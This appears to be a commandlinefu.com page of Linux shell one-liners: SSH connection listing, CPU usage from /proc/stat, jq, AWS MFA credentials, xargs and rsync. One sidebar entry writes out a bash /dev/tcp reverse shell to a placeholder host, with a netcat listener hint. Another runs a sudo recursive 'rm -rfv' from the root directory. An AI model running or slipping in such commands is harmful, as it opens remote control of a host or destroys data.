Commands by toxick (2)


  • List the remote addresses of established SSH connections:
    netstat -tn | awk '($4 ~ /:22\s*/) && ($6 ~ /^EST/) {print substr($5, 0, index($5,":"))}'
    toxick · 2012-10-03 04:47:54
  • Using the output of 'ps' to determine CPU usage is misleading, as the CPU column in 'ps' shows CPU usage per process averaged over the entire lifetime of the process. To get *current* CPU usage (without scraping a top screen) you need to pull some numbers from /proc/stat. Here, we take two readings, one second apart, determine how much IDLE time was spent across all CPUs, divide by the number of CPUs, and then subtract from 100 to get non-idle time.
    NUMCPUS=`grep ^proc /proc/cpuinfo | wc -l`; FIRST=`cat /proc/stat | awk '/^cpu / {print $5}'`; sleep 1; SECOND=`cat /proc/stat | awk '/^cpu / {print $5}'`; USED=`echo 2 k 100 $SECOND $FIRST - $NUMCPUS / - p | dc`; echo ${USED}% CPU Usage
    toxick · 2012-10-02 03:57:51
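
    A more readable equivalent of the same two-sample idle-delta approach, as a sketch (assumes bash, a 1-second sample, and the standard /proc/stat layout where field 5 of the "cpu" line is aggregate idle jiffies; bash integer arithmetic drops the two decimal places the dc version keeps):

    NUMCPUS=$(grep -c ^processor /proc/cpuinfo)   # number of CPUs
    IDLE1=$(awk '/^cpu / {print $5}' /proc/stat)  # idle jiffies, first reading
    sleep 1
    IDLE2=$(awk '/^cpu / {print $5}' /proc/stat)  # idle jiffies, second reading
    echo "$(( 100 - (IDLE2 - IDLE1) / NUMCPUS ))% CPU Usage"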

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.



Check These Out

Mac OS X: remove extra languages to save over 3 GB of space.
This will get the job done in the most efficient way, spawning only one `rm` process. "On-the-fly" find data is displayed through `tee`, and you should have plenty of time to ctrl-c if needed before it's too late. You may need to re-run this after major Software Updates. To leave more languages in, add more -and \! -iname "lang*" clauses:

$ sudo find / -iname "*.lproj" -and \! -iname "en*" -and \! -iname "spanish*" -print0 | tee /dev/stderr | sudo xargs -0 rm -rfv

Edit: note the 2nd sudo near the end of the pipeline - it is necessary, since the first sudo does not carry across the pipe.

cd to (or operate on) a file across parallel directories
This is useful for quickly jumping around branches in a file system, or operating on a parallel file. Tested in bash. cd to (substitute in PWD, a for b), where PWD is the bash environment variable holding the working directory; see the sketch below.
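
A minimal sketch of the idea (the branch and file names are hypothetical), using bash's ${var/pattern/replacement} substitution on $PWD. From /home/user/project/branch-a/src, jump to the matching directory of a sibling branch, or operate on the parallel copy of a file:

$ cd ${PWD/branch-a/branch-b}
$ diff file.c ${PWD/branch-a/branch-b}/file.c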

Find files with at least one exec bit set
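A sketch of one way to do this, assuming GNU find, whose -perm /mode form matches files with any of the given permission bits set (here the user, group, and other execute bits):

$ find . -type f -perm /111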

Connect-back shell using Bash built-ins
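A sketch of the classic built-ins-only form (192.0.2.1 and 4444 are placeholders for the listening host and port; /dev/tcp/HOST/PORT is a bash pseudo-device, so no external binaries are involved):

$ bash -i >& /dev/tcp/192.0.2.1/4444 0>&1

On the listening side you would first run something like nc -l 4444 (or nc -l -p 4444, depending on the netcat flavour).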

Convert tab separate file (TSV) to JSON with jq
With this command you can convert a tab-separated file (TSV) into a JSON file with jq. For example, an input.tsv like this:

i-0b9adca882e5e6326  172.16.0.188
i-088dd69e5c3624888  172.16.0.102
i-0e70eac180537d4aa  172.16.0.85

will produce the corresponding JSON output.
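
A sketch of a jq invocation that fits this description (the field names id and ip are assumptions, not part of the original): -R reads raw lines, -n plus inputs consumes them all, and split("\t") turns each row into an array to build objects from:

$ jq -Rn '[inputs | split("\t") | {id: .[0], ip: .[1]}]' input.tsv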

Get AWS temporary credentials ready to export based on a MFA virtual appliance
You might want to secure your AWS operations by requiring an MFA token. But then, to use the API or tools, you need to pass credentials generated with that MFA token. This command asks you for the MFA code and retrieves the credentials using the AWS CLI. To print the exports, you can use: `awk '{ print "export AWS_ACCESS_KEY_ID=\"" $1 "\"\n" "export AWS_SECRET_ACCESS_KEY=\"" $2 "\"\n" "export AWS_SESSION_TOKEN=\"" $3 "\"" }'` You must adapt the command line to include:

* $MFA_ID: the ARN of the virtual MFA, or the serial number of the physical one
* the TTL for the credentials
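
A sketch of the retrieval step, assuming the standard aws sts get-session-token call ($MFA_CODE and the 900-second TTL are placeholders); with --output text, the three credential fields come back whitespace-separated, which is what the awk printer above expects:

$ read -p "MFA code: " MFA_CODE
$ aws sts get-session-token --serial-number $MFA_ID --token-code $MFA_CODE --duration-seconds 900 --output text --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]'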

See how many more processes are allowed, awesome!
There is a limit to how many processes you can run at the same time for each user, especially with web hosts. If the maximum number of processes for your user is 200, then the following sets OPTIMUM_P to 100:

$ OPTIMUM_P=$(( (`ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l`) / 2 ))

This is very useful in scripts because it is such a fast, low-resource way (compared to ps, who, lsof, etc.) to determine how many processes are currently running for whichever user. The number of currently running processes is subtracted from the high limit set up for the account (see limits.conf, pam, initscript).

An easy-to-understand example: this searches the current directory for shell scripts, and runs up to 100 'file' commands at the same time, greatly speeding up the command:

$ find . -type f | xargs -P $OPTIMUM_P -iFNAME file FNAME | sed -n '/shell script text/p'

I am using it in my http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html, especially for the xargs command. xargs has a -P option that lets you specify how many processes to run at the same time. For instance, if you have 1000 URLs in a text file and want to download all of them fast with curl, you could download 100 at a time (check ps output on a separate [pt]ty for proof) like this:

$ cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}'

I like to do things as fast as possible on my servers. I have several types of servers and hosting environments, some with very restrictive jail shells with a 20-process limit, some with 200, some with 8000, so for the jailed shells a hard-coded xargs -P10 would kill my shell or dump core. Using the above I can set the -P value dynamically, so xargs always works, as in the example above. If you were building a process-killer (very common for cheap hosting) this would also be handy. Note that if you are only allowed 20 or so processes, you should just use -P1 with xargs.

Convert JSON to YAML
Requires installing json2yaml via npm: $ npm install -g json2yaml (it can also read JSON piped from stdin). Ref: https://www.npmjs.com/package/json2yaml
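
A usage sketch (input.json and output.yaml are placeholder filenames; the file-argument form is an assumption, while the stdin pipe is per the package notes above):

$ json2yaml input.json > output.yaml
$ cat input.json | json2yaml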

Create a mirror of a local folder, on a remote server
Create an exact mirror of the local folder "/root/files" on the remote server 'remote_server', over SSH listening on port 22. Files and folders on the destination that do not exist in the source will be deleted.
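
A sketch of an rsync invocation matching this description (mirroring the source path at the same location on the destination is an assumption; --delete is what removes destination files absent from the source):

$ rsync -avz --delete -e 'ssh -p 22' /root/files/ remote_server:/root/files/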


Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):
